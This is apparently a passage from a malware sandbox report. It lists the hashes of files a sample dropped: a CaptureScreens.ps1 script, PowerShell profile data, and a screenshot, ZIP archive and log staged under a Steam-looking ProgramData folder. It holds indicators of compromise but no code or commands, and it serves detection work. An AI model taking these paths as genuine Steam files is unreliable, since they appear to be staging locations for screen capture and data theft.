| SHA512 | c3065baa302032012081480005f6871be27f26da758dc3b6e829ea8a3458e5c0a4740e408678f3ecf4600279d3fcad796f62f35b8591e46200ce896899573024 |
C:\Users\Admin\AppData\Local\Temp\CaptureScreens.ps1
| MD5 | 17103e27657428d243a5ce15b56d6fd3 |
| SHA1 | de29bb705e5f2a401651f59e91f5fa8e18f7adec |
| SHA256 | 898a545f58f25d6167535c9c52dc8a8ce01434aeb66272fe0d486b7655205329 |
| SHA512 | 69215e1b35b428f5c09a04310a653edf8f7b7cb252268d8545af7b5ac8e1f7776ccd79fff3b250fc7e4d251ca6d8b91e3a13366a2ad3f3b9aba183c3a1f1e304 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | ca24df1817fa1aa670674846e5d41614 |
| SHA1 | dac66ea013bcc46d24f1ece855568187c6080eaf |
| SHA256 | 3b9d5525002b14e4b5c044e80d3035420d037b48d94a1f836c5a253df0c539db |
| SHA512 | fb1848fa381fa360171ba13e1aa15c7029ff543c806f34ae524f04bda637b48e1aa06e831843aa830173c0a218072da7f3d0bc52ce56364b888c53234a224631 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 5caad758326454b5788ec35315c4c304 |
| SHA1 | 3aef8dba8042662a7fcf97e51047dc636b4d4724 |
| SHA256 | 83e613b6dc8d70e3bb67c58535e014f58f3e8b2921e93b55137d799fc8c56391 |
| SHA512 | 4e0d443cf81e2f49829b0a458a08294bf1bdc0e38d3a938fb8274eeb637d9a688b14c7999dd6b86a31fcec839a9e8c1a9611ed0bbae8bd59caa9dba1e8253693 |
C:\ProgramData\Steam\Launcher\EN-Llxdhewc\Screenshots\Screenshot.png
| MD5 | 4df03b78dadff41e128680b9a0fa6f77 |
| SHA1 | 32a951a0b3ad6312328410fe847bd4c52fc0e9b8 |
| SHA256 | b03e954caec1bfe16c958cd9183eb6489f7715e92342b75bac90781e0272adb8 |
| SHA512 | 25b75b901b85d29a7e9a41c5d99469ee24995c642e6238b5898de006d2cc9f1a78790b62f068d6085fe6584520e5248e76a75f70c50c4a6dd1b5181177b1c556 |
C:\ProgramData\Steam\Launcher\EN-LLX~1.ZIP
| MD5 | c863916513a7332cb690c9bd46b34a26 |
| SHA1 | 06ee0880ae4073260ab1a575619ded65b2c32aa2 |
| SHA256 | c5b142618205637f363fa7a7d5cfbef041e7f7df9c24ffa8e2b2e06920d51cdb |
| SHA512 | 3e3fd090410d92407f314f40c37f314ab716b9b1cdd3d340e48e1bc6712dea5754c89ca681d268d2959a7fc5f92bf9c20ceabfee9aaaadb5ae61ca9bb1aad811 |
C:\ProgramData\Steam\Launcher\EN-LLX~1\debug.log
| MD5 | d98208aa8b4716dc78668d73d4974765 |
| SHA1 | 4d93e8bd3e6b9e75611f89a60cfe670f9650d411 |
| SHA256 | 48474e3629529f17238c804dc9e88b1acd39bdfec2ada4512d628f24a80c8a9e |
| SHA512 | 5426b3ff37f17019c3bf63eb8c2124655ff110f317e684294650de3a2cbca9b6bbdcb9b351299c08e4b13915e94ab9d3ede36f437b6687d2f71df41ae4368517 |